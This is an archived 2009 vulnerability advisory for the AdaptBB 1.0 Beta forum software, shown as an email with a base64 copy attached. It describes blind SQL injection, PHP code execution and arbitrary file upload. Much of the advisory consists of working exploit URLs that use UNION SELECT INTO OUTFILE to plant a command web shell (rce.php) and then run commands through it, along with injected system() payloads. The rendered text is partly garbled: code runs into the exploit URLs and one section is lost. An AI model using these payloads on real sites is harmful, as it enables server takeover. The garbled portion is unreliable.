TUCoPS :: HP Unsorted A :: va3123.htm

AdaptBB 1.0 Beta Multiple Remote Vulnerabilities
AdaptBB 1.0 Beta Multiple Remote Vulnerabilities
AdaptBB 1.0 Beta Multiple Remote Vulnerabilities


--001636c5b352b026cc04671f5b11
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/ 

[+] Bugs: [A] Multiple Blind SQL Injection
          [B] Multiple Dynamic Code Execution
          [C] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 09 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary SQL
queries.


- [B] Multiple Dynamic Code Execution

[-] Risk: hight
[-] File affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary php
code.

...

if ($_GET['box']) {
$folder = $_GET['box'];
}

...

$ddata[] = ucwords($folder);

...

eval (" ?> ".str_replace($cdata, $ddata,
stripslashes(template($view."_header")))." http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL 
SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=messages&user=blabla&box=-1' UNION ALL 
SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=edit_post&id=-1' UNION ALL SELECT '',2,3,4,5,6,7,8,9 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

To execute commands:

http://site/path/rce.php?cmd=uname -a 


- [B] Multiple Dynamic Code Execution

http://www.site.com/path/index.php?do=profile&user=blabla&box= 
echo "
"; system('ls'); echo "
"?>

http://www.site.com/path/index.php?do=messages&user=blabla&box= 
echo "
"; system('ls'); echo "
"?>


*************************************************

[+] Fix

To fix them you must check the input properly.
However is not recommended to store your real
username and password in the cookies.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--001636c5b352b026cc04671f5b11
Content-Type: text/plain; charset=US-ASCII; 
	name="AdaptBB 1.0 Beta Multiple Remote Vulnerabilities-09042009.txt"
Content-Disposition: attachment; 
	filename="AdaptBB 1.0 Beta Multiple Remote Vulnerabilities-09042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftbhulod0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBBZGFwdEJCClsrXSBWZXJzaW9uOiAxLjAgQmV0YQpbK10gV2Vic2l0ZTogaHR0
cDovL3NvdXJjZWZvcmdlLm5ldC9wcm9qZWN0cy9hZGFwdGJiLwoKWytdIEJ1Z3M6IFtBXSBNdWx0
aXBsZSBCbGluZCBTUUwgSW5qZWN0aW9uCiAgICAgICAgICBbQl0gTXVsdGlwbGUgRHluYW1pYyBD
b2RlIEV4ZWN1dGlvbgogICAgICAgICAgW0NdIEFyYml0cmFyeSBGaWxlIFVwbG9hZAoKWytdIEV4
cGxvaXRhdGlvbjogUmVtb3RlClsrXSBEYXRlOiAwOSBBcHIgMjAwOQoKWytdIERpc2NvdmVyZWQg
Ynk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBBdXRob3I6IFNhbHZhdG9yZSAi
ZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1haWw6IGRyb3NvcGhpbGF4eHhAZ21h
aWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQnVncwoKCi0gW0FdIE11bHRpcGxl
IEJsaW5kIFNRTCBJbmplY3Rpb24KClstXSBSaXNrOiBtZWRpdW0KWy1dIFJlcXVpc2l0ZXM6IG1h
Z2ljX3F1b3Rlc19ncGMgPSBvZmYKWy1dIEZpbGUgYWZmZWN0ZWQ6IGFsbW9zdCBhbGwgb2YgdGhl
IGZpbGVzIGFyZSAKdnVsbmVyYWJsZQoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3QgdG8gZXhlY3V0
ZSBhcmJpdHJhcnkgU1FMCnF1ZXJpZXMuCgoKLSBbQl0gTXVsdGlwbGUgRHluYW1pYyBDb2RlIEV4
ZWN1dGlvbgoKWy1dIFJpc2s6IGhpZ2h0ClstXSBGaWxlIGFmZmVjdGVkOiBhbG1vc3QgYWxsIG9m
IHRoZSBmaWxlcyBhcmUgCnZ1bG5lcmFibGUKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRvIGV4
ZWN1dGUgYXJiaXRyYXJ5IHBocApjb2RlLgoKLi4uCgppZiAoJF9HRVRbJ2JveCddKSB7DQokZm9s
ZGVyID0gJF9HRVRbJ2JveCddOw0KfQoKLi4uCgokZGRhdGFbXSA9IHVjd29yZHMoJGZvbGRlcik7
CgouLi4KCmV2YWwgKCIgPz4gIi5zdHJfcmVwbGFjZSgkY2RhdGEsICRkZGF0YSwgc3RyaXBzbGFz
aGVzKHRlbXBsYXRlKCR2aWV3LiJfaGVhZGVyIikpKS4iIDw/cGhwICIpOwoKLi4uCgoKLSBbQ10g
QXJiaXRyYXJ5IEZpbGUgVXBsb2FkCgpbLV0gUmlzazogaGlnaHQKWy1dIEZpbGUgYWZmZWN0ZWQ6
IGF0dGFjaC5waHAKClRoaXMgYnVnIGFsbG93cyBhIHJlZ2lzdGVyZWQgdXNlciB0byB1cGxvYWQg
CmFyYml0cmFyeSBmaWxlcyBhbmQgdG8gZXhlY3V0ZSB0aGVtIGZyb20gCmluYy9hdHRhY2htZW50
cyBkaXJlY3RvcnkuIFRoaXMgaXMgcG9zc2libGUgCmJlY2F1c2UgdGhlcmUgYXJlIG5vIGNvbnRy
b2xzIG9uIGZpbGUgZXh0ZW5zaW9uIApvbiB0aGUgc2VydmVyIHNpZGUgYnV0IG9ubHkgb24gdGhl
IGNsaWVudCBzaWRlLiAKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqCgpbK10gQ29kZQoKCi0gW0FdIE11bHRpcGxlIEJsaW5kIFNRTCBJbmplY3Rpb24K
Cmh0dHA6Ly9zaXRlL3BhdGgvaW5jL2F0dGFjaC5waHA/aWQ9LTEnIFVOSU9OIEFMTCBTRUxFQ1Qg
Jzw/cGhwIHN5c3RlbSgkX0dFVFtjbWRdKSUzYiA/PicsMiwzLDQsNSw2LDcsOCBJTlRPIE9VVEZJ
TEUgJy92YXIvd3d3L2h0ZG9jcy9wYXRoL3JjZS5waHAnJTIzCgpodHRwOi8vc2l0ZS9wYXRoL2lu
ZGV4LnBocD9kbz1wcm9maWxlJnVzZXI9YmxhYmxhJmJveD0tMScgVU5JT04gQUxMIFNFTEVDVCAn
PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pJTNiID8+JywyLDMsNCw1LDYsNyw4IElOVE8gT1VURklM
RSAnL3Zhci93d3cvaHRkb2NzL3BhdGgvcmNlLnBocCclMjMKCmh0dHA6Ly9zaXRlL3BhdGgvaW5k
ZXgucGhwP2RvPW1lc3NhZ2VzJnVzZXI9YmxhYmxhJmJveD0tMScgVU5JT04gQUxMIFNFTEVDVCAn
PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pJTNiID8+JywyLDMsNCw1LDYsNyw4IElOVE8gT1VURklM
RSAnL3Zhci93d3cvaHRkb2NzL3BhdGgvcmNlLnBocCclMjMKCmh0dHA6Ly9zaXRlL3BhdGgvaW5k
ZXgucGhwP2RvPWVkaXRfcG9zdCZpZD0tMScgVU5JT04gQUxMIFNFTEVDVCAnPD9waHAgc3lzdGVt
KCRfR0VUW2NtZF0pJTNiID8+JywyLDMsNCw1LDYsNyw4LDkgSU5UTyBPVVRGSUxFICcvdmFyL3d3
dy9odGRvY3MvcGF0aC9yY2UucGhwJyUyMwoKVG8gZXhlY3V0ZSBjb21tYW5kczoKCmh0dHA6Ly9z
aXRlL3BhdGgvcmNlLnBocD9jbWQ9dW5hbWUgLWEKCgotIFtCXSBNdWx0aXBsZSBEeW5hbWljIENv
ZGUgRXhlY3V0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5kZXgucGhwP2RvPXByb2Zp
bGUmdXNlcj1ibGFibGEmYm94PTw/cGhwIGVjaG8gIjxwcmU+Ijsgc3lzdGVtKCdscycpOyBlY2hv
ICI8L3ByZT4iPz4KCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9pbmRleC5waHA/ZG89bWVzc2Fn
ZXMmdXNlcj1ibGFibGEmYm94PTw/cGhwIGVjaG8gIjxwcmU+Ijsgc3lzdGVtKCdscycpOyBlY2hv
ICI8L3ByZT4iPz4KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqCgpbK10gRml4CgpUbyBmaXggdGhlbSB5b3UgbXVzdCBjaGVjayB0aGUgaW5wdXQgcHJv
cGVybHkuCkhvd2V2ZXIgaXMgbm90IHJlY29tbWVuZGVkIHRvIHN0b3JlIHlvdXIgcmVhbCAKdXNl
cm5hbWUgYW5kIHBhc3N3b3JkIGluIHRoZSBjb29raWVzLgoKCioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKio--001636c5b352b026cc04671f5b11--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH